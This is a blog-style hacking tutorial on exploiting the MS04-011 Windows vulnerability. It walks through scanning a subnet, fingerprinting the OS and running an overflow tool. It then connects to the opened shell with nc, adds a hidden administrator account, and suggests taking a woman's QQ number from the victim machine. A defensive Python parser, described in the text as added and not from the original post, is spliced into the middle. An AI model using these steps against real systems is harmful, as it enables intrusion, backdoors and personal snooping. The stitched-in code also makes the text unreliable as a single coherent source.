MS04011 vulnerability

zhaozj  2021-02-12

Well, everyone should know this vulnerability by now, haha; it is a very good one. Hackers use it to get Administrators rights on the operating system and a shell on the box. Not much else to say; let's see how machines get broken into with it.

1. First, download the MS04011 overflow exploit; there are plenty online.

The tools are DSSCAN, Getos and the MS04011 overflow tool.

DSSCAN: this tool scans for the MS04011 vulnerability. When you scan the target machine it lists the IP address, host name, NetBIOS name and, most importantly, the status. It scans every live host in the IP range; a machine with the MS04011 vulnerability is listed with status Vulnerable, otherwise Not Vulnerable. It usually scans 64 IP addresses at a time.

Getos: used to get the operating system type, but the target machine must have port 139 open.

MS04011: the tool that does the overflow.

2. How to overflow

First run DSSCAN, enter the IP in the IP field, then click the button on the right so that it is entered into the box on the right, where you can select it.

Then click Start. For example, we scan and get a result like this:

IP            hostname  netbios  status
192.168.1.33  you       you      Vulnerable
192.168.1.34  Haha      Haha     Not Vulnerable

Everyone can see that the status of 192.168.1.33 is Vulnerable, which means it has the MS04011 vulnerability.

Let's overflow it now. Before starting the overflow, first get the other machine's operating system type with Getos.

Open CMD, go to the directory where your programs are, and enter Getos 192.168.1.33

The result will be:

[*] Connecting Port 139 .....
[*] Sending session request .....
[*] Sending Negotiation Request ....
Sending Setup Account Request ....
[*] Successful ...

REMOTE OS:
-------------
Workgroup                  <- this is the name of the workgroup
Windows 2000 Lan Manger
Windows 5.0                <- this is the operating system version; Windows 5.1 would be XP
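To use this kind of output on the defending side, here is an added Python example (not from the original post and not part of DSSCAN or Getos) that parses DSSCAN-style status lines and a Getos "Windows 5.x" version line into a list of hosts that still need the MS04-011 update; the sample lines are constructed from the ones shown above, and the version-to-product mapping is the standard NT kernel numbering.

```python
import re

# Constructed sample DSSCAN-style output, modelled on the lines shown in the post.
DSSCAN_OUTPUT = """\
IP            hostname  netbios  status
192.168.1.33  you       you      Vulnerable
192.168.1.34  Haha      Haha     Not Vulnerable
"""

# Constructed sample Getos-style output for one host.
GETOS_OUTPUT = """\
REMOTE OS:
-------------
Workgroup
Windows 2000 Lan Manger
Windows 5.0
"""

# NT kernel version reported as "Windows 5.x" -> product family (standard mapping).
NT_VERSIONS = {"5.0": "Windows 2000", "5.1": "Windows XP", "5.2": "Windows Server 2003"}


def parse_dsscan(text):
    """Return {ip: status} from DSSCAN-style lines, keeping the two-word 'Not Vulnerable' intact."""
    hosts = {}
    for line in text.splitlines()[1:]:  # first line is the column header
        parts = line.split()
        if len(parts) < 4 or not re.match(r"^\d+\.\d+\.\d+\.\d+$", parts[0]):
            continue
        hosts[parts[0]] = " ".join(parts[3:])
    return hosts


def parse_getos_version(text):
    """Return the product family from the 'Windows 5.x' line, or None if no such line exists."""
    for line in text.splitlines():
        m = re.match(r"^Windows (\d+\.\d+)$", line.strip())
        if m:
            return NT_VERSIONS.get(m.group(1), "Windows NT " + m.group(1))
    return None


def hosts_needing_patch(scan_text, os_by_ip):
    """Pair each host marked Vulnerable with its OS so the MS04-011 patch list can be prioritised."""
    return [(ip, os_by_ip.get(ip, "unknown"))
            for ip, status in parse_dsscan(scan_text).items()
            if status.lower() == "vulnerable"]


if __name__ == "__main__":
    os_map = {"192.168.1.33": parse_getos_version(GETOS_OUTPUT)}
    for ip, os_name in hosts_needing_patch(DSSCAN_OUTPUT, os_map):
        print(f"{ip}: {os_name} - apply the MS04-011 update")
```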

OK, we know that it is Windows 2000, so now we use MS04011 to overflow it.

First open two CMD windows and enter MS04011 0 192.168.1.33 in both at the same time; one of them will carry the overflow through.

In one of the CMD windows you will see:

Shellcode Size 404

RET VALUE = 1726   // Note: 1726 is the code that means the overflow succeeded

For XP systems, use MS04011 1 192.168.1.33

3. How to get the machine's shell

Use the most powerful Swiss army knife (called NC), haha; this tool is not usually included, so get it online.

Then enter NC 192.168.1.33 1234 in CMD; 1234 is the port number opened by the overflow. Haha, doesn't a prompt like this appear:

C:\Winnt\System32>

// Haha, you have succeeded. You can do whatever you want.

For example: net user haha 123 /add // creates a user haha with password 123 on the machine; net localgroup administrators haha /add // puts haha into the Administrators group. Of course, you can also go to the Tencent directory under the applications folder and grab the MM's QQ number, and contact her later.

Serious statement: do not use this method for anything illegal; if you do, I bear no responsibility. I published this article so that you pay attention to the security of your own systems and patch often. There are a lot of machines in the country with this hole, hehe!!!!!

Please credit the original address when reposting: https://www.9cbs.com/read-6854.html
